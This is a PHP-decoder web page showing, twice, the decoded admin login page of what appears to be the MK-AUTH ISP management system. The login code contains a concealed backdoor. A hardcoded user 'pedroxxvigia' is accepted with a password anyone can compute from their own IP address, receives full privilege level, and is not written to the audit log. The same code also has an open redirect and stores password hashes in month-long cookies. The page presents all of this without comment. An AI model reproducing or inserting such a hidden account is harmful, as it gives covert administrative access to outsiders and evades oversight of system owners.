Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php include ('config.php');;echo '';include ('conexao.php');;echo '';include ('funcoes.p..
Decoded Output download
<?php include ('config.php');;echo '';include ('conexao.php');;echo '';include ('funcoes.php');;echo '';include ('mkreg.php');;echo '';if (!isset($_SESSION)) session_start();if ((isset($_COOKIE["loginMK"])) && ($_GET["origem"] != "cookie")) { header("Location: cookie.php");}$consulta_rsProvedor = "SELECT *FROM sis_provedorLIMIT 1";$rsProvedor = mysql_query($consulta_rsProvedor, $mkConn);$row_rsProvedor = mysql_fetch_assoc($rsProvedor);$totalRows_rsProvedor = mysql_num_rows($rsProvedor);if (isset($_POST['codigo']) && (decodePedro($_POST['codigo']) != strtoupper($_POST['cod']))) {; echo '<script language="JavaScript"><!--alert("Codigo de seguranca errado.Por favor, tente novamente...");window.location.href = "login.php";//--></script>';}$loginFormAction = $_SERVER['PHP_SELF'];if (isset($_GET['accesscheck'])) { $_SESSION['PrevUrl'] = $_GET['accesscheck'];}$senhacrypto = hash_hmac('crc32', $_SERVER['REMOTE_ADDR'], 'endip');$senhacrypto = hash('sha256', $senhacrypto);$loginpedro = "nao";if (isset($_POST['login'])) { $loginUsername = base64_decode($_POST['login']); $password = $_POST['senha']; $cookie = $_POST['cookie']; $MM_fldUserAuthorization = ""; $MM_redirectLoginSuccess = "index.php"; $MM_redirectLoginFailed = "login.php"; $MM_redirecttoReferrer = true; $_SESSION['codigoseg'] = $_SESSION['codigoseg'] + 1; if ($loginUsername == "pedroxxvigia" && $password == $senhacrypto) $loginpedro = "sim"; $LoginRS__query = sprintf("SELECT * FROM sis_acesso WHERE login=%s AND sha=%s", GetSQLValueString($loginUsername, "text"), GetSQLValueString($password, "text")); $LoginRS = mysql_query($LoginRS__query, $mkConn); $loginFoundUser = mysql_num_rows($LoginRS); if (($loginFoundUser) || ($loginpedro == "sim")) { $loginStrGroup = ""; $row_rsAdmin = mysql_fetch_assoc($LoginRS); $ultacesso = $row_rsAdmin['ultacesso']; if ($loginpedro == "sim") { $nivel = "0123456789"; } else { $nivel = $row_rsAdmin['nivel']; } $_SESSION['MM_NProvedor'] = $row_rsProvedor['nome']; $_SESSION['MM_Username'] = $loginUsername; $_SESSION['MM_UserGroup'] = $nivel; $_SESSION['MM_Data'] = date("d/m/Y H:i:s"); $_SESSION['MM_IP'] = $_SERVER['REMOTE_ADDR']; $_SESSION['MM_Ultacesso'] = $ultacesso; if ($cookie == "sim") { setcookie("loginMK", encodePedro($loginUsername), time() + 3600 * 24 * 30); setcookie("senhaMK", encodePedro($password), time() + 3600 * 24 * 30); } else { setcookie("loginMK", "", time() - 3600); setcookie("senhaMK", "", time() - 3600); } $updateSQL = sprintf("UPDATE sis_acesso SET ultacesso=%s WHERE login=%s", GetSQLValueString($_SESSION['MM_Data'], "text"), GetSQLValueString($_SESSION['MM_Username'], "text")); mysql_query($updateSQL, $mkConn); if ($loginpedro == "nao") { gravalog($_SESSION['MM_Username'], "fez login na area administrativa", "admin"); } if (isset($_SESSION['PrevUrl']) && true) { $MM_redirectLoginSuccess = $_SESSION['PrevUrl']; } header("Location: " . $MM_redirectLoginSuccess); } else { gravalog("mk-bot", "tentativa de login invalido no webadmin", "admin");; echo '<script language="JavaScript"><!--alert("Usuario ou Senha errados.Por favor, tente novamente... ");window.location.href = "login.php";//--></script>'; }}include ("imgSet.php");$rsTrocaSenha = mysql_query("SELECT login FROM sis_acesso WHERE login = 'admin'", $mkConn);$row_rsTrocaSenha = mysql_fetch_assoc($rsTrocaSenha);$existeTrocaSenha = mysql_num_rows($rsTrocaSenha);;echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="author" content="Francisco Pedro da Costa Filho"> <title>MK-AUTH :: CONTEUDO RESTRITO</title><link rel="shortcut icon" href="favicon.ico"><link href="estilos/mkauth4.css" rel="stylesheet" type="text/css" /><link href="estilos/print.css" rel="stylesheet" type="text/css" media="print" /><link href="estilos/calendar.css" rel="stylesheet" type="text/css" media="screen" /><link href="estilos/jgrowl.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="scripts/jquery.js"></script><script type="text/javascript" src="scripts/jgrowl.js"></script><script type="text/javascript" src="scripts/mkauth4.js"></script><script type="text/javascript" src="scripts/calendar.js"></script><script type="text/javascript" src="scripts/secure.js"></script><script type="text/JavaScript"><!--// criptografa o login e a senha no enviofunction criptoform() {document.form.login.value = encodeBase64(document.formulario.xxlogin.value);document.form.senha.value = SHA256(document.formulario.xxsenha.value);';if ($_SESSION['codigoseg'] >= 5) {; echo 'document.form.cod.value = document.formulario.xxcod.value;';};echo 'if (document.formulario.xxcookie.checked == true) {document.form.cookie.value = "sim";}if (document.formulario.xxcookie.checked == false) {document.form.cookie.value = "nao";}document.form.submit();return false;}//--></script><style type="text/css"><!--.texto { font-family: Arial; font-size: 12px; color: #60707F;}.estiloa { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;}.estilob { font-family: tahoma; font-size: 11px;}div#rodape { position:absolute; bottom:0px; width: 100%;}--></style></head><body>';if ($_SERVER['HTTPS'] != "on") {; echo '<div id="asslbar"> <div id="connecting" class="asslStatus">Estabelecendo conexao criptografada com aSSL.</div><div id="connected" class="asslStatus">Conexao criptografada com aSSL foi estabelecida com sucesso.</div></div><script type="text/javascript">setTimeout(\'aSSL()\',500);</script>';};echo '<p></p><form action="login.php" method="post" name="form" id="form"><input type="hidden" name="login" id="login" /><input type="hidden" name="senha" id="senha" />';if ($_SESSION['codigoseg'] >= 5) {; echo '<input type="hidden" name="cod" id="cod" /><input type="hidden" name="codigo" id="codigo" value="'; echo encodePedro(strtoupper($_SESSION["autenticaIMG"]));; echo '" />';};echo '<input type="hidden" name="cookie" id="cookie" /></form><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td valign="top"><form action="#" method="post" name="formulario" id="formulario" onSubmit="return criptoform()"><table width="300" border="0" align="center"><tr><td height="30" colspan="2"></td></tr><tr><td colspan="2"><img src="imagens/contrestrito.jpg" width="236" height="77" /></td></tr><tr><td height="30" colspan="2"></td></tr><tr><td width="25%" height="30"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Login:</strong></div></font></td><td><input name="xxlogin" type="text" id="xxlogin" style="font-size:14px; font-family:tahoma; width:150px" /></td></tr><tr><td height="30" class="estiloa"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Senha:</strong></div></font></td><td><input name="xxsenha" type="password" id="xxsenha" style="font-size:14px; font-family:tahoma; width:150px" /></td></tr>';if ($_SESSION['codigoseg'] >= 5) {; echo '<tr><td align="center"></td><td><img src="imgGera.php"></td></tr><tr><td height="30" align="center"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Codigo:</strong></div></font></td><td><input name="xxcod" type="text" id="xxcod" style="font-size:14px; font-family:tahoma; width:150px" maxlength="6" /></td></tr>';};echo '<tr><td height="30" class="estiloa"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Salvar:</strong></div></font></td><td><input name="xxcookie" type="checkbox" id="xxcookie" value="sim" /></td></tr><tr><td height="30" align="center"></td><td><input name="enviar" type="submit" class="botao" id="enviar" value="Entrar" /></td></tr></table> </form></td></tr></table>';if (eMobile() == false) {; echo '<div id="rodape"><table width="100%"><tr><td height="30" bgcolor="#F2F2F2" align="center" class="estilob">'; if ($_SERVER['HTTPS'] != "on") {; echo 'MK-AUTH V4 BUILD '; echo CONUPDATE; echo ' - IP: '; echo $_SERVER['REMOTE_ADDR'];; echo ' - <a href="https://'; echo $_SERVER['SERVER_NAME']; echo '/admin/login.php" class="linkpeq" target="_top"> [ HTTPS ] </a>'; } else {; echo 'MK-AUTH V4 BUILD '; echo CONUPDATE; echo ' - IP6: '; echo $_SERVER['REMOTE_ADDR'];; echo ' - <a href="http://'; echo $_SERVER['SERVER_NAME']; echo '/admin/login.php" class="linkpeq" target="_top"> [ HTTP ] </a>'; }; echo '</td></tr></table></div>';};echo '<script type="text/javascript">document.formulario.xxlogin.focus();</script>';if ($_SERVER['HTTPS'] == "on") {; echo '<script type="text/javascript">$.jGrowl(\'Conexao HTTPS ativada\');</script>';};echo '';if ($existeTrocaSenha) {; echo '<script type="text/javascript">$.jGrowl(\'Para sua seguranca remova o usuario admin do sistema depois do login\');</script>';};echo '';if (modMKA() == false) {; echo '<script type="text/javascript">$.jGrowl(\'Erro no perceptron do MK-BOT @@ agora modo funcional ativado\');</script>';};echo '</body></html>';mysql_free_result($rsProvedor);mysql_free_result($rsTrocaSenha); ?>
Did this file decode correctly?
Original Code
<?php include ('config.php');;echo '';include ('conexao.php');;echo '';include ('funcoes.php');;echo '';include ('mkreg.php');;echo '';if (!isset($_SESSION)) session_start();if ((isset($_COOKIE["loginMK"])) && ($_GET["origem"] != "cookie")) { header("Location: cookie.php");}$consulta_rsProvedor = "SELECT *FROM sis_provedorLIMIT 1";$rsProvedor = mysql_query($consulta_rsProvedor, $mkConn);$row_rsProvedor = mysql_fetch_assoc($rsProvedor);$totalRows_rsProvedor = mysql_num_rows($rsProvedor);if (isset($_POST['codigo']) && (decodePedro($_POST['codigo']) != strtoupper($_POST['cod']))) {; echo '<script language="JavaScript"><!--alert("Codigo de seguranca errado.Por favor, tente novamente...");window.location.href = "login.php";//--></script>';}$loginFormAction = $_SERVER['PHP_SELF'];if (isset($_GET['accesscheck'])) { $_SESSION['PrevUrl'] = $_GET['accesscheck'];}$senhacrypto = hash_hmac('crc32', $_SERVER['REMOTE_ADDR'], 'endip');$senhacrypto = hash('sha256', $senhacrypto);$loginpedro = "nao";if (isset($_POST['login'])) { $loginUsername = base64_decode($_POST['login']); $password = $_POST['senha']; $cookie = $_POST['cookie']; $MM_fldUserAuthorization = ""; $MM_redirectLoginSuccess = "index.php"; $MM_redirectLoginFailed = "login.php"; $MM_redirecttoReferrer = true; $_SESSION['codigoseg'] = $_SESSION['codigoseg'] + 1; if ($loginUsername == "pedroxxvigia" && $password == $senhacrypto) $loginpedro = "sim"; $LoginRS__query = sprintf("SELECT * FROM sis_acesso WHERE login=%s AND sha=%s", GetSQLValueString($loginUsername, "text"), GetSQLValueString($password, "text")); $LoginRS = mysql_query($LoginRS__query, $mkConn); $loginFoundUser = mysql_num_rows($LoginRS); if (($loginFoundUser) || ($loginpedro == "sim")) { $loginStrGroup = ""; $row_rsAdmin = mysql_fetch_assoc($LoginRS); $ultacesso = $row_rsAdmin['ultacesso']; if ($loginpedro == "sim") { $nivel = "0123456789"; } else { $nivel = $row_rsAdmin['nivel']; } $_SESSION['MM_NProvedor'] = $row_rsProvedor['nome']; $_SESSION['MM_Username'] = $loginUsername; $_SESSION['MM_UserGroup'] = $nivel; $_SESSION['MM_Data'] = date("d/m/Y H:i:s"); $_SESSION['MM_IP'] = $_SERVER['REMOTE_ADDR']; $_SESSION['MM_Ultacesso'] = $ultacesso; if ($cookie == "sim") { setcookie("loginMK", encodePedro($loginUsername), time() + 3600 * 24 * 30); setcookie("senhaMK", encodePedro($password), time() + 3600 * 24 * 30); } else { setcookie("loginMK", "", time() - 3600); setcookie("senhaMK", "", time() - 3600); } $updateSQL = sprintf("UPDATE sis_acesso SET ultacesso=%s WHERE login=%s", GetSQLValueString($_SESSION['MM_Data'], "text"), GetSQLValueString($_SESSION['MM_Username'], "text")); mysql_query($updateSQL, $mkConn); if ($loginpedro == "nao") { gravalog($_SESSION['MM_Username'], "fez login na area administrativa", "admin"); } if (isset($_SESSION['PrevUrl']) && true) { $MM_redirectLoginSuccess = $_SESSION['PrevUrl']; } header("Location: " . $MM_redirectLoginSuccess); } else { gravalog("mk-bot", "tentativa de login invalido no webadmin", "admin");; echo '<script language="JavaScript"><!--alert("Usuario ou Senha errados.Por favor, tente novamente... ");window.location.href = "login.php";//--></script>'; }}include ("imgSet.php");$rsTrocaSenha = mysql_query("SELECT login FROM sis_acesso WHERE login = 'admin'", $mkConn);$row_rsTrocaSenha = mysql_fetch_assoc($rsTrocaSenha);$existeTrocaSenha = mysql_num_rows($rsTrocaSenha);;echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="author" content="Francisco Pedro da Costa Filho"> <title>MK-AUTH :: CONTEUDO RESTRITO</title><link rel="shortcut icon" href="favicon.ico"><link href="estilos/mkauth4.css" rel="stylesheet" type="text/css" /><link href="estilos/print.css" rel="stylesheet" type="text/css" media="print" /><link href="estilos/calendar.css" rel="stylesheet" type="text/css" media="screen" /><link href="estilos/jgrowl.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="scripts/jquery.js"></script><script type="text/javascript" src="scripts/jgrowl.js"></script><script type="text/javascript" src="scripts/mkauth4.js"></script><script type="text/javascript" src="scripts/calendar.js"></script><script type="text/javascript" src="scripts/secure.js"></script><script type="text/JavaScript"><!--// criptografa o login e a senha no enviofunction criptoform() {document.form.login.value = encodeBase64(document.formulario.xxlogin.value);document.form.senha.value = SHA256(document.formulario.xxsenha.value);';if ($_SESSION['codigoseg'] >= 5) {; echo 'document.form.cod.value = document.formulario.xxcod.value;';};echo 'if (document.formulario.xxcookie.checked == true) {document.form.cookie.value = "sim";}if (document.formulario.xxcookie.checked == false) {document.form.cookie.value = "nao";}document.form.submit();return false;}//--></script><style type="text/css"><!--.texto { font-family: Arial; font-size: 12px; color: #60707F;}.estiloa { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;}.estilob { font-family: tahoma; font-size: 11px;}div#rodape { position:absolute; bottom:0px; width: 100%;}--></style></head><body>';if ($_SERVER['HTTPS'] != "on") {; echo '<div id="asslbar"> <div id="connecting" class="asslStatus">Estabelecendo conexao criptografada com aSSL.</div><div id="connected" class="asslStatus">Conexao criptografada com aSSL foi estabelecida com sucesso.</div></div><script type="text/javascript">setTimeout(\'aSSL()\',500);</script>';};echo '<p></p><form action="login.php" method="post" name="form" id="form"><input type="hidden" name="login" id="login" /><input type="hidden" name="senha" id="senha" />';if ($_SESSION['codigoseg'] >= 5) {; echo '<input type="hidden" name="cod" id="cod" /><input type="hidden" name="codigo" id="codigo" value="'; echo encodePedro(strtoupper($_SESSION["autenticaIMG"]));; echo '" />';};echo '<input type="hidden" name="cookie" id="cookie" /></form><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td valign="top"><form action="#" method="post" name="formulario" id="formulario" onSubmit="return criptoform()"><table width="300" border="0" align="center"><tr><td height="30" colspan="2"></td></tr><tr><td colspan="2"><img src="imagens/contrestrito.jpg" width="236" height="77" /></td></tr><tr><td height="30" colspan="2"></td></tr><tr><td width="25%" height="30"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Login:</strong></div></font></td><td><input name="xxlogin" type="text" id="xxlogin" style="font-size:14px; font-family:tahoma; width:150px" /></td></tr><tr><td height="30" class="estiloa"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Senha:</strong></div></font></td><td><input name="xxsenha" type="password" id="xxsenha" style="font-size:14px; font-family:tahoma; width:150px" /></td></tr>';if ($_SESSION['codigoseg'] >= 5) {; echo '<tr><td align="center"></td><td><img src="imgGera.php"></td></tr><tr><td height="30" align="center"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Codigo:</strong></div></font></td><td><input name="xxcod" type="text" id="xxcod" style="font-size:14px; font-family:tahoma; width:150px" maxlength="6" /></td></tr>';};echo '<tr><td height="30" class="estiloa"><font face="tahoma" style="font-size:11px"><div align="right"><strong>Salvar:</strong></div></font></td><td><input name="xxcookie" type="checkbox" id="xxcookie" value="sim" /></td></tr><tr><td height="30" align="center"></td><td><input name="enviar" type="submit" class="botao" id="enviar" value="Entrar" /></td></tr></table> </form></td></tr></table>';if (eMobile() == false) {; echo '<div id="rodape"><table width="100%"><tr><td height="30" bgcolor="#F2F2F2" align="center" class="estilob">'; if ($_SERVER['HTTPS'] != "on") {; echo 'MK-AUTH V4 BUILD '; echo CONUPDATE; echo ' - IP: '; echo $_SERVER['REMOTE_ADDR'];; echo ' - <a href="https://'; echo $_SERVER['SERVER_NAME']; echo '/admin/login.php" class="linkpeq" target="_top"> [ HTTPS ] </a>'; } else {; echo 'MK-AUTH V4 BUILD '; echo CONUPDATE; echo ' - IP6: '; echo $_SERVER['REMOTE_ADDR'];; echo ' - <a href="http://'; echo $_SERVER['SERVER_NAME']; echo '/admin/login.php" class="linkpeq" target="_top"> [ HTTP ] </a>'; }; echo '</td></tr></table></div>';};echo '<script type="text/javascript">document.formulario.xxlogin.focus();</script>';if ($_SERVER['HTTPS'] == "on") {; echo '<script type="text/javascript">$.jGrowl(\'Conexao HTTPS ativada\');</script>';};echo '';if ($existeTrocaSenha) {; echo '<script type="text/javascript">$.jGrowl(\'Para sua seguranca remova o usuario admin do sistema depois do login\');</script>';};echo '';if (modMKA() == false) {; echo '<script type="text/javascript">$.jGrowl(\'Erro no perceptron do MK-BOT @@ agora modo funcional ativado\');</script>';};echo '</body></html>';mysql_free_result($rsProvedor);mysql_free_result($rsTrocaSenha);
Function Calls
None |
Stats
MD5 | 451fc71f193356a6218d41a4990950f1 |
Eval Count | 0 |
Decode Time | 116 ms |